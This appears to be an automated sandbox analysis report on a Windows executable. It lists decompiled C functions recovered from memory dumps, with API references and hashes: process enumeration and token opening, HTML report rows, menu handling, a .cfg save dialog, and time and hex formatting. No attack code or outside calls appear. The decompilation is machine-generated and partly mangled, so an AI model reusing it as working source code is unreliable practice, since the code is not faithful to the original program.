                                                                                                                0x00405a7b
                                                                                                                0x004059d4
                                                                                                                0x004059d4
                                                                                                                0x004059dc
                                                                                                                0x004059ee
                                                                                                                0x00000000
                                                                                                                0x004059f0
                                                                                                                0x004059f0
                                                                                                                0x004059f6
                                                                                                                0x004059f7
                                                                                                                0x004059fa
                                                                                                                0x00405a03
                                                                                                                0x00405a2b
                                                                                                                0x00405a2e
                                                                                                                0x00405a3c
                                                                                                                0x00405a40
                                                                                                                0x00000000
                                                                                                                0x00405a42
                                                                                                                0x00405a42
                                                                                                                0x00405a54
                                                                                                                0x00405a59
                                                                                                                0x00405a5a
                                                                                                                0x00405a5a
                                                                                                                0x00405a61
                                                                                                                0x00405a69
                                                                                                                0x00405a7f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a69
                                                                                                                0x00405a05
                                                                                                                0x00405a0e
                                                                                                                0x00405a17
                                                                                                                0x00000000
                                                                                                                0x00405a19
                                                                                                                0x00405a19
                                                                                                                0x00405a1c
                                                                                                                0x00405a1d
                                                                                                                0x00405a20
                                                                                                                0x00405a29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a29
                                                                                                                0x00405a17
                                                                                                                0x00405a03
                                                                                                                0x00000000
                                                                                                                0x00405a6b
                                                                                                                0x00405a6e
                                                                                                                0x00405a72
                                                                                                                0x00405a72
                                                                                                                0x00000000
                                                                                                                0x004059d4
                                                                                                                0x00405a81
                                                                                                                0x00405a84
                                                                                                                0x00405a8f

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                  • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                  • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                  • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                  • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                  • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                  • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                  • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                  • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                • wcschr.MSVCRT ref: 00405A0E
                                                                                                                • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 768606695-0
                                                                                                                • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                0x00407639
                                                                                                                0x00407646
                                                                                                                0x00407647
                                                                                                                0x00407654
                                                                                                                0x0040765f
                                                                                                                0x0040765f
                                                                                                                0x0040766b
                                                                                                                0x0040766d
                                                                                                                0x00407672
                                                                                                                0x00407677
                                                                                                                0x0040767d
                                                                                                                0x00407680
                                                                                                                0x00407686
                                                                                                                0x00407691
                                                                                                                0x00407697
                                                                                                                0x00407699
                                                                                                                0x00407699
                                                                                                                0x0040769c
                                                                                                                0x0040769f
                                                                                                                0x004076a3
                                                                                                                0x004076a7
                                                                                                                0x004076ab
                                                                                                                0x004076b5
                                                                                                                0x004076be
                                                                                                                0x004076c8
                                                                                                                0x004076de
                                                                                                                0x004076ee
                                                                                                                0x004076f1
                                                                                                                0x004076f4
                                                                                                                0x004076fa
                                                                                                                0x00407708
                                                                                                                0x0040770e
                                                                                                                0x00407718
                                                                                                                0x0040771d
                                                                                                                0x00407723
                                                                                                                0x00407724
                                                                                                                0x00407727
                                                                                                                0x0040772c
                                                                                                                0x0040772f
                                                                                                                0x00407734
                                                                                                                0x0040773f
                                                                                                                0x00407744
                                                                                                                0x00407745
                                                                                                                0x0040767d
                                                                                                                0x00407760

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                0x0040605e
                                                                                                                0x00406061
                                                                                                                0x00406069
                                                                                                                0x00406074
                                                                                                                0x0040607a
                                                                                                                0x0040607e
                                                                                                                0x00406082
                                                                                                                0x00406148
                                                                                                                0x0040614e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406088
                                                                                                                0x00406088
                                                                                                                0x00406093
                                                                                                                0x00406098
                                                                                                                0x0040609f
                                                                                                                0x004060ae
                                                                                                                0x004060b6
                                                                                                                0x004060be
                                                                                                                0x004060c6
                                                                                                                0x004060ca
                                                                                                                0x004060cf
                                                                                                                0x004060d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004060de
                                                                                                                0x00406129
                                                                                                                0x00406129
                                                                                                                0x0040612d
                                                                                                                0x0040612f
                                                                                                                0x00406130
                                                                                                                0x00406134
                                                                                                                0x00406137
                                                                                                                0x0040613c
                                                                                                                0x0040613c
                                                                                                                0x00000000
                                                                                                                0x0040612d
                                                                                                                0x004060e7
                                                                                                                0x004060f0
                                                                                                                0x004060f2
                                                                                                                0x004060f2
                                                                                                                0x004060f9
                                                                                                                0x004060fd
                                                                                                                0x00406102
                                                                                                                0x0040610c
                                                                                                                0x00406112
                                                                                                                0x00406117
                                                                                                                0x00406117
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406102
                                                                                                                0x00406122
                                                                                                                0x00406128
                                                                                                                0x00000000
                                                                                                                0x0040613f
                                                                                                                0x0040613f
                                                                                                                0x00406140
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                0x00402bee
                                                                                                                0x00402bf8
                                                                                                                0x00402cae
                                                                                                                0x00402c08
                                                                                                                0x00402c10
                                                                                                                0x00402c11
                                                                                                                0x00402c12
                                                                                                                0x00402c13
                                                                                                                0x00402c20
                                                                                                                0x00402c27
                                                                                                                0x00402c2e
                                                                                                                0x00402c30
                                                                                                                0x00402c37
                                                                                                                0x00402c4b
                                                                                                                0x00402c50
                                                                                                                0x00402c53
                                                                                                                0x00402c55
                                                                                                                0x00402c3e
                                                                                                                0x00402c3e
                                                                                                                0x00402c41
                                                                                                                0x00402c41
                                                                                                                0x00402c5a
                                                                                                                0x00402c60
                                                                                                                0x00402c65
                                                                                                                0x00402c68
                                                                                                                0x00402c6d
                                                                                                                0x00402c77
                                                                                                                0x00402c7c
                                                                                                                0x00402c7e
                                                                                                                0x00402c87
                                                                                                                0x00402ca5
                                                                                                                0x00402ca5
                                                                                                                0x00402c87
                                                                                                                0x00402c7c
                                                                                                                0x00402c6d
                                                                                                                0x00000000
                                                                                                                0x00402cac

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155976603-0
                                                                                                                • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                0x004036ef
                                                                                                                0x004036f6
                                                                                                                0x0040370b
                                                                                                                0x00403712
                                                                                                                0x00403717
                                                                                                                0x0040371c
                                                                                                                0x0040371f
                                                                                                                0x0040372c
                                                                                                                0x00403735
                                                                                                                0x00403738
                                                                                                                0x00403744
                                                                                                                0x00403751
                                                                                                                0x00403758
                                                                                                                0x00403760
                                                                                                                0x00403769
                                                                                                                0x0040376c
                                                                                                                0x00403778
                                                                                                                0x0040377b
                                                                                                                0x0040378b
                                                                                                                0x00403792
                                                                                                                0x00403795
                                                                                                                0x00403798
                                                                                                                0x0040379b
                                                                                                                0x004037a2
                                                                                                                0x004037a5
                                                                                                                0x004037a8
                                                                                                                0x004037af
                                                                                                                0x004037b7
                                                                                                                0x004037c3
                                                                                                                0x00000000
                                                                                                                0x004037d4
                                                                                                                0x004037dc

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004036F6
                                                                                                                • memset.MSVCRT ref: 00403712
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                  • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                • wcscpy.MSVCRT ref: 004037C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                • String ID: L$cfg
                                                                                                                • API String ID: 275899518-3734058911
                                                                                                                • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                0x00404ed0
                                                                                                                0x00404edf
                                                                                                                0x00404ef6
                                                                                                                0x00000000
                                                                                                                0x00404f00
                                                                                                                0x00404f1c
                                                                                                                0x00404f31
                                                                                                                0x00404f41
                                                                                                                0x00404f4e
                                                                                                                0x00404f5d
                                                                                                                0x00404f66
                                                                                                                0x00404f69
                                                                                                                0x00404f69
                                                                                                                0x00404f71
                                                                                                                0x00404f77
                                                                                                                0x00404f7d

                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                • wcscpy.MSVCRT ref: 00404F41
                                                                                                                • wcscat.MSVCRT ref: 00404F4E
                                                                                                                • wcscat.MSVCRT ref: 00404F5D
                                                                                                                • wcscpy.MSVCRT ref: 00404F71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                0x00404fe0
                                                                                                                0x00404fe9
                                                                                                                0x00405000
                                                                                                                0x00405005
                                                                                                                0x00405009
                                                                                                                0x0040500c
                                                                                                                0x0040500e
                                                                                                                0x00405015
                                                                                                                0x00405016
                                                                                                                0x00405021
                                                                                                                0x00405026
                                                                                                                0x00405027
                                                                                                                0x0040502c
                                                                                                                0x00405031
                                                                                                                0x00405039
                                                                                                                0x0040503f
                                                                                                                0x00405044
                                                                                                                0x00405048
                                                                                                                0x0040504e
                                                                                                                0x00405056
                                                                                                                0x0040505c
                                                                                                                0x0040504e
                                                                                                                0x00405065
                                                                                                                0x0040506a
                                                                                                                0x00405072
                                                                                                                0x00405079

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
